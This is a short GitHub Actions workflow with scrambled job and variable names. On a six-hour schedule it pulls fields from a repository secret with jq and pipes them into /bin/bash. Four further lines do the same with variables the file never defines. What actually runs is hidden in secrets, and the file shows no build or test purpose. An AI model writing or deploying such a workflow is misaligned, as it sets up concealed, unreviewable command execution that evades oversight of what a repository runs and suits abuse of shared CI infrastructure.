name: zhangminming3487
on:
  workflow_dispatch:
  schedule:
    - cron: '21 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhangminming3487
        env:
          tmtp80: ${{ secrets.tmtp80 }}
        run: |
          echo $tmtp80 | jq -r .uj8 | /bin/bash
          echo $pgmi4629 | jq -r .iq45 | /bin/bash
          echo $wq80528 | jq -r .dlvn82441 | /bin/bash
          echo $f2 | jq -r .p7 | /bin/bash
          echo $flt312 | jq -r .vucp6564 | /bin/bash

